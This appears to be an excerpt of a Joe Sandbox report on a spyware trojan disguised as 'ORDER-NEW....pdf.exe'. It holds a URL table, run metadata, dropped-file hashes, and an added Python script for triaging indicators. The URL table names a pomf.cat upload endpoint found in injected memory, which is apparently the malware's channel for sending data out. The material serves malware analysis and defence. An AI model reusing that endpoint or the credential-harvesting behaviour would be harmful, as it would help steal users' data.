              https://cvision.media.net/new/286x175/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9 | bhvF129.tmp.8.dr | false | | high
              http://www.nirsoft.net/ | vbc.exe, 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp | false | | high
              https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588 | bhvF129.tmp.8.dr | false | Avira URL Cloud: safe | unknown
              https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png | bhvF129.tmp.8.dr | false | | high
              https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css | bhvF129.tmp.8.dr | false | URL Reputation: safe | unknown
              https://www.google.com/chrome/static/css/main.v3.min.css | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&ps | bhvF129.tmp.8.dr | false | | high
              https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937 | bhvF129.tmp.8.dr | false | URL Reputation: safe | unknown
              https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5 | bhvF129.tmp.8.dr | false | URL Reputation: safe | unknown
              https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&pq | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k | bhvF129.tmp.8.dr | false | | high
              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/?gws_rd=ssl | bhvF129.tmp.8.dr | false | | high
              https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e | bhvF129.tmp.8.dr | false | Avira URL Cloud: safe | unknown
              https://adservice.google.com/adsid/google/si?gadsid=AORoGNTzML9SvDOPLAOFxwn751k-3cAoAULy2FWuSRb89C_P | bhvF129.tmp.8.dr | false | | high
              https://cvision.media.net/new/100x75/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9 | bhvF129.tmp.8.dr | false | | high
              https://cvision.media.net/new/300x300/2/41/100/83/b5cbfa68-1c93-41c9-8797-4f9b532bc0b6.jpg?v=9 | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/chrome/static/images/download-browser/pixel_phone.png | bhvF129.tmp.8.dr | false | | high
              http://pki.goog/gsr2/GTS1O1.crt0 | bhvF129.tmp.8.dr | false | URL Reputation: safe | unknown
              https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1 | bhvF129.tmp.8.dr | false | | high
              https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/chrome/static/images/app-store-download.png | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/complete/search?q=ch&cp=2&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0 | bhvF129.tmp.8.dr | false | | high
              https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png | bhvF129.tmp.8.dr | false | | high
                                                                                            https://contextual.media.net/bhvF129.tmp.8.drfalse
                                                                                              high
                                                                                              https://logincdn.msauth.net/16.000.28230.00/Converged_v21033.cssbhvF129.tmp.8.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://pki.goog/repository/0bhvF129.tmp.8.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://www.msn.com/vbc.exe, 00000008.00000003.712462189.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712423496.00000000022B7000.00000004.00000001.sdmp, bhvF129.tmp.8.drfalse
                                                                                                high
                                                                                                https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drfalse
                                                                                                  high
                                                                                                  https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1bhvF129.tmp.8.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/m=IvlUebhvF129.tmp.8.drfalse
                                                                                                    high
                                                                                                    https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9bhvF129.tmp.8.drfalse
                                                                                                      high
                                                                                                      https://www.google.com/favicon.icobhvF129.tmp.8.drfalse
                                                                                                        high
                                                                                                        http://www.msn.com/bhvF129.tmp.8.drfalse
                                                                                                          high
                                                                                                          https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.pngbhvF129.tmp.8.drfalse
                                                                                                            high
                                                                                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734bhvF129.tmp.8.drfalse
                                                                                                              high
                                                                                                              https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpgbhvF129.tmp.8.drfalse
                                                                                                                high
                                                                                                                https://www.google.com/chrome/static/images/fallback/icon-twitter.jpgbhvF129.tmp.8.drfalse
                                                                                                                  high
                                                                                                                  https://172.217.23.78/vbc.exe, 00000008.00000003.712859827.00000000022AF000.00000004.00000001.sdmp, bhvF129.tmp.8.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://cvision.media.net/new/100x75/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9bhvF129.tmp.8.drfalse
                                                                                                                    high
                                                                                                                    https://www.google.com/images/nav_logo299.pngbhvF129.tmp.8.drfalse
                                                                                                                      high
                                                                                                                      http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804bhvF129.tmp.8.drfalse
                                                                                                                        high
                                                                                                                        https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9bhvF129.tmp.8.drfalse
                                                                                                                          high
                                                                                                                          https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3bhvF129.tmp.8.drfalse
                                                                                                                            high
                                                                                                                            https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.jsbhvF129.tmp.8.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://images.outbrainimg.com/transform/v3/eyJpdSI6IjVhZWEwOTA0MmYxYzJjMDRlMmU1NDg1YzZmNjY2NTU5N2E5NbhvF129.tmp.8.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://contextual.media.net/48/nrrV18753.jsbhvF129.tmp.8.drfalse
                                                                                                                              high
                                                                                                                              https://www.google.com/chrome/static/images/fallback/icon-help.jpgbhvF129.tmp.8.drfalse
                                                                                                                                high
                                                                                                                                https://www.google.com/complete/search?q=c&cp=1&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&bhvF129.tmp.8.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.google.com/accounts/serviceloginvbc.exefalse
                                                                                                                                    high
                                                                                                                                    https://consent.google.com/set?pc=s&uxe=4421591bhvF129.tmp.8.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.google.com/chrome/static/images/homepage/google-enterprise.pngbhvF129.tmp.8.drfalse
                                                                                                                                        high
                                                                                                                                        http://images.outbrainimg.com/transform/v3/eyJpdSI6ImYxODk5OTBhOWZjYjFmZjNjNmMxNDhmYjkzM2M3NzY1Mzk3ZbhvF129.tmp.8.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.google.com/chrome/static/images/homepage/google-dev.pngbhvF129.tmp.8.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.google.com/chrome/static/images/thank-you/thankyou-animation.jsonbhvF129.tmp.8.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.google.com/images/hpp/Chrome_Owned_96x96.pngbhvF129.tmp.8.drfalse
                                                                                                                                              high
                                                                                                                                              http://crl.pki.goog/gsr2/gsr2.crl0?bhvF129.tmp.8.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://srtb.msn.com/auction?a=de-ch&b=28e3747a031f4b2a8498142b7c961529&c=MSN&d=http%3A%2F%2Fwww.msnbhvF129.tmp.8.drfalse
                                                                                                                                                high
                                                                                                                                                http://pki.goog/gsr2/GTSGIAG3.crt0)bhvF129.tmp.8.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrFbhvF129.tmp.8.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2bhvF129.tmp.8.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://policies.yahoo.com/w3c/p3p.xmlbhvF129.tmp.8.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.google.com/bhvF129.tmp.8.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.google.com/chrome/static/images/fallback/icon-fb.jpgbhvF129.tmp.8.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.google.com/images/searchbox/desktop_searchbox_sprites302_hr.pngbhvF129.tmp.8.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.9Ky5Gf3gP0o.O/m=gapi_iframesbhvF129.tmp.8.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://google.com/bhvF129.tmp.8.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://adservice.google.com/adsid/google/si?gadsid=AORoGNSvKHbjRugN8Bruw1IrFif72u8bwsJvZ4BRSrMAhil_bhvF129.tmp.8.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://pki.goog/gsr2/GTS1O1.crt0#bhvF129.tmp.8.drfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://pomf.cat/upload.php&https://a.pomf.cat/ORDER-NEW....pdf.exe, 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, AppLaunch.exe, 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmptrue
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=httpsvbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxYWZjY2Q0NWJhMmI1MGJkMWJjMzhmMGFlZWM2MDJmMjc2ObhvF129.tmp.8.drfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.google.com/complete/search?q=chrome&cp=6&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authusbhvF129.tmp.8.drfalse
                                                                                                                                                                      high
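Added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: a Python triage helper run over a few rows copied from the URL table above (URL, Source, Malicious). It splits the Source cell into memory-dump and dropped-file references and keeps only URLs that the sandbox flagged malicious or that were found in executable memory, which is what separates the one real indicator (the pomf.cat string at 0x402000, protection 0x40, inside AppLaunch.exe, process 5) from the google.com and msn.com rows that exist only in bhvF129.tmp.8.dr (dropped by process 8, vbc.exe) or in that process's read/write heap. The decoding of the .sdmp filename fields as pid, stage, serial, base address, page protection and type is an assumption inferred from the values on this page, not something the report documents.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Union

# Executable page-protection bits from winnt.h: PAGE_EXECUTE (0x10),
# PAGE_EXECUTE_READ (0x20), PAGE_EXECUTE_READWRITE (0x40), PAGE_EXECUTE_WRITECOPY (0x80).
EXECUTE_MASK = 0xF0

# Joe Sandbox memory dumps are named like
#   00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp
# Assumption (not documented on this page): pid . stage . serial . base . protect . type
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<serial>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<kind>[0-9A-F]{8})\.sdmp$",
    re.IGNORECASE,
)
# Dropped files are named <file>.<pid>.dr, e.g. bhvF129.tmp.8.dr
DROPPED_RE = re.compile(r"^(?P<name>.+)\.(?P<pid>\d+)\.dr$")


@dataclass
class MemSource:
    process: str
    pid: int
    base: int
    protect: int


@dataclass
class FileSource:
    name: str
    pid: int  # process that dropped the file, or -1 for a bare process/file name


def parse_sources(field: str) -> List[Union[MemSource, FileSource]]:
    """Split one Source cell into memory-dump and dropped-file references."""
    parts = [p.strip() for p in field.split(",") if p.strip()]
    out: List[Union[MemSource, FileSource]] = []
    i = 0
    while i < len(parts):
        m = SDMP_RE.match(parts[i + 1]) if i + 1 < len(parts) else None
        if m:  # "<process>, <dump>.sdmp" pair
            out.append(MemSource(parts[i], int(m["pid"], 16),
                                 int(m["base"], 16), int(m["protect"], 16)))
            i += 2
        else:  # dropped file, or a process/file named without a dump
            d = DROPPED_RE.match(parts[i])
            out.append(FileSource(parts[i], int(d["pid"]) if d else -1))
            i += 1
    return out


def triage(rows) -> Dict[str, List[str]]:
    """Map each URL to the reasons it counts as an IOC; an empty list means noise."""
    verdict: Dict[str, List[str]] = {}
    for url, source, malicious in rows:
        reasons = ["flagged malicious by the sandbox"] if malicious else []
        for s in parse_sources(source):
            if isinstance(s, MemSource) and s.protect & EXECUTE_MASK:
                r = f"string in executable memory of {s.process} (pid {s.pid}) at {s.base:#x}"
                if r not in reasons:
                    reasons.append(r)
        verdict[url] = reasons
    return verdict


def iocs(rows) -> Dict[str, List[str]]:
    """Only the URLs that survive triage."""
    return {u: r for u, r in triage(rows).items() if r}


# Rows copied from the report's URL table (constructed input for this example).
ROWS = [
    ("https://www.google.com/favicon.ico", "bhvF129.tmp.8.dr", False),
    ("https://172.217.23.78/",
     "vbc.exe, 00000008.00000003.712859827.00000000022AF000.00000004.00000001.sdmp, bhvF129.tmp.8.dr",
     False),
    ("https://www.google.com/accounts/servicelogin", "vbc.exe", False),
    ("http://pomf.cat/upload.php&https://a.pomf.cat/",
     "ORDER-NEW....pdf.exe, 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, "
     "ORDER-NEW....pdf.exe, 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, "
     "AppLaunch.exe, 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, "
     "AppLaunch.exe, 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp",
     True),
]

if __name__ == "__main__":
    for url, reasons in triage(ROWS).items():
        print(url, "->", reasons or ["browser-artifact noise"])
```

The executable-memory rule is the useful one here: a URL that a password-recovery helper reads into its heap while dumping browser history tells you nothing about the malware's infrastructure, whereas a URL living in an RWX region at the image base of a process the sample injected into is part of the injected payload and belongs on the block list.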
                                                                                                                                                                      No contacted IP infos
                                                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                      Analysis ID:557358
                                                                                                                                                                      Start date:21.01.2022
                                                                                                                                                                      Start time:01:09:07
                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 10m 36s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Sample file name:ORDER-NEW....pdf.exe
                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:22
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • HDC enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.phis.troj.spyw.evad.winEXE@11/9@0/0
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      HDC Information:
                                                                                                                                                                      • Successful, ratio: 97.4% (good quality ratio 94.5%)
                                                                                                                                                                      • Quality average: 85.8%
                                                                                                                                                                      • Quality standard deviation: 23%
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 99%
                                                                                                                                                                      • Number of executed functions: 156
                                                                                                                                                                      • Number of non-executed functions: 279
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.89.179.12
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com
                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
01:10:17 | API Interceptor | 1x Sleep call for process: AppLaunch.exe modified
01:10:33 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                      No context
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):1.0293440585745517
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:hIP8dyokHBUZMXCaK2+BKS/u7saS274ItIS:KsXsBUZMXCas//u7saX4ItIS
                                                                                                                                                                      MD5:B7607C5A67D60518DD35306885D2D5F0
                                                                                                                                                                      SHA1:89EB5329FC6F3C7990C4846F82064AE67D6340D9
                                                                                                                                                                      SHA-256:CD4381937B8E65768C8E6B01E37A2B0342A6279D64DC233E172D131FA21D5321
                                                                                                                                                                      SHA-512:6E57D47BD17B5E456F75ECB0C89FC47E78C35E3FDACFEA3959E84511C2CD41EE455EDB463580834E2D4780268668D0EC82B320B58137C2B98C85357980BC7BD1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
Preview (UTF-16 decoded):
Version=1
EventType=CLR20r3
EventTime=132871974276913395
ReportType=2
Consent=1
UploadTime=132871974323006811
ReportStatus=524384
ReportIdentifier=8ad46cfc-44ff-464d-a1ba-55836edb9374
IntegratorReportIdentifier=6745f9a5-acf7-48d9-a47c-67f9c0d272ee
Wow64Host=34404
Wow64Guest=332
NsAppName=ORDER-NEW....pdf.exe
OriginalFilename=ORDER-NEW.exe
AppSessionGuid=00001acc-0001-001b-915f-213c5b0ed801
TargetAppId=W:0006ebc7296f253ef428205651e46351d26900000000!00004729717dab3dd01b2ca591c86a021...
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Fri Jan 21 00:10:28 2022, 0x1205a4 type
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):226070
                                                                                                                                                                      Entropy (8bit):3.6927076008180193
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:oUIB/Wr59gIOgF5P3d0kvS01jd+p7TUCgU5:oUB59RpDfd0J5pvTj
                                                                                                                                                                      MD5:AC7E17B4571E2921F7CEE372AECA7C2E
                                                                                                                                                                      SHA1:FB54FEF3DFA45217D659CAC8A065BAD67CF36A45
                                                                                                                                                                      SHA-256:8579D5A99A271FB4796EA56B2F41DC4196DBAAF7907B31C87AD4F8975FC19900
                                                                                                                                                                      SHA-512:1A3482D03D8B55781B60A334E785744C00F11093E5B7178EAB8DBED063D2D261ADDED3FD44513AA40559AD5609D83EA1D00A3A1D631C9881A2F6D5994245CB21
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
Preview: MDMP header (binary minidump, GenuineIntel, W. Europe Standard Time, build 17134.1.x86fre.rs4_release.180410-1804); raw dump omitted
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8440
                                                                                                                                                                      Entropy (8bit):3.7116856008780728
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Rrl7r3GLNisr6u6YrGSUZwYgmfZ+OYSDz+prRP89bAesfzWAm:RrlsNiI6u6Y6SUZwYgmfcOYSowAdf8
                                                                                                                                                                      MD5:F8D33B020A04B76623B3DF988494C771
                                                                                                                                                                      SHA1:6107B8B4A98C023A040E2D478E91EE386538B1ED
                                                                                                                                                                      SHA-256:E72F166B7499D474C87536715569CAE42A28E0A3ECEC8D50E510652C368CB78F
                                                                                                                                                                      SHA-512:CEFE2816013CC0D050C857853DF0DF4D3D6D845C5DBD5BDDD705753BCA43901537F9F48860FA68228BC8924EB86D4A8EF6806A025D6B94FF5C0F59ADA5D35209
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
Preview (UTF-16 decoded):
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
 <OSVersionInformation>
  <WindowsNTVersion>10.0</WindowsNTVersion>
  <Build>17134</Build>
  <Product>(0x30): Windows 10 Pro</Product>
  <Edition>Professional</Edition>
  <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>
  <Revision>1</Revision>
  <Flavor>Multiprocessor Free</Flavor>
  <Architecture>X64</Architecture>
  <LCID>1033</LCID>
 </OSVersionInformation>
 <ProcessInformation>
  <Pid>6860</Pid>
  ...
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4788
                                                                                                                                                                      Entropy (8bit):4.554814536874402
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:cvIwSD8zsFJgtWI9JVWSC8Bt8fm8M4JJ6E8FTp+q8vvEnnsd2OuOsd:uITffakSNUJJ6zKvI42OuOsd
                                                                                                                                                                      MD5:4BB86D387161A85F5B749B606B4D345E
                                                                                                                                                                      SHA1:DF32A0D54392C434920109868AABD723A2083FA1
                                                                                                                                                                      SHA-256:3B698B082DCDCDBA264AE8B0288D006F2E75740EB9B1178262FACDAEB6848370
                                                                                                                                                                      SHA-512:E01B21EE40F054CBDD14053BB79F421D19AB24D8F72BA68605308454DA78F2C7E52838D55BCB6908475EFE2CE23073C9E20A15648F4D292ED18A055108085030
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
Preview:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<req ver="2">
 <tlm>
  <src>
   <desc>
    <mach>
     <os>
      <arg nm="vermaj" val="10" />
      <arg nm="vermin" val="0" />
      <arg nm="verbld" val="17134" />
      <arg nm="vercsdbld" val="1" />
      <arg nm="verqfe" val="1" />
      <arg nm="csdbld" val="1" />
      <arg nm="versp" val="0" />
      <arg nm="arch" val="9" />
      <arg nm="lcid" val="1033" />
      <arg nm="geoid" val="244" />
      <arg nm="sku" val="48" />
      <arg nm="domain" val="0" />
      <arg nm="prodsuite" val="256" />
      <arg nm="ntprodtype" val="1" />
      <arg nm="platid" val="2" />
      <arg nm="tmsi" val="1351281" />
      <arg nm="osinsty" val="1" />
      <arg nm="iever" val="11.1.17134.0-11.0.47" />
      <arg nm="portos" val="0" />
      <arg nm="ram" val="4096" />
      ...
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):88
                                                                                                                                                                      Entropy (8bit):5.498871107126153
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:PFYyImXF9mNwkR/BhgnGgu8oMiOxn:PH1Gl5Qx
                                                                                                                                                                      MD5:537ED8DF56D73F21A755994D1C93FFC2
                                                                                                                                                                      SHA1:28962F1FDAECDA158CDCCBAE4BCCD8B8E3DB3226
                                                                                                                                                                      SHA-256:394D4FC05A58E0679261425BEB08D6D4454CDE7B7F7125BDFF71F2DFC89EC02C
                                                                                                                                                                      SHA-512:5CB00F9B5201141447ED4C7CAB3973A01A429C023CC470851144D035752530CF99B57FA86A0CDE1C97275B35A2DCA6375A489C4D77552FD8B11A789C40E9288A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:LeNF7Goy7uuKWKsmWAhDmhEi2BbZGy27JQQaO8wc/LiTgVXryptsvCdDD6azBwPsBF7YpxYLPiV+1+f4iDYK9A==
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x74a33dcf, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):29884416
                                                                                                                                                                      Entropy (8bit):1.082255052623099
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:GDmPet8HVmy49w781tfXy7R4aUpPX7Cr6f63rsLOZ:Sm4y4JrO
                                                                                                                                                                      MD5:A7B64D8170665009A33F856D18628AEA
                                                                                                                                                                      SHA1:8891BA0D467C97814FCD77D67A78A67E9CD914F6
                                                                                                                                                                      SHA-256:62312B3DE715982ECBBD2BD9741124112E95EB301CF523BF0F55B1565D75B0AA
                                                                                                                                                                      SHA-512:DB716213E115225254F05923C8C5B566CEA41502CAF327DC78A8C6A27B83494DC157DC547E5D280927F9DBB392D0594AD0765244379321C02545C2281A491119
                                                                                                                                                                      Malicious:false
Preview: binary ESE database page; raw dump omitted
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Qn:Qn
                                                                                                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
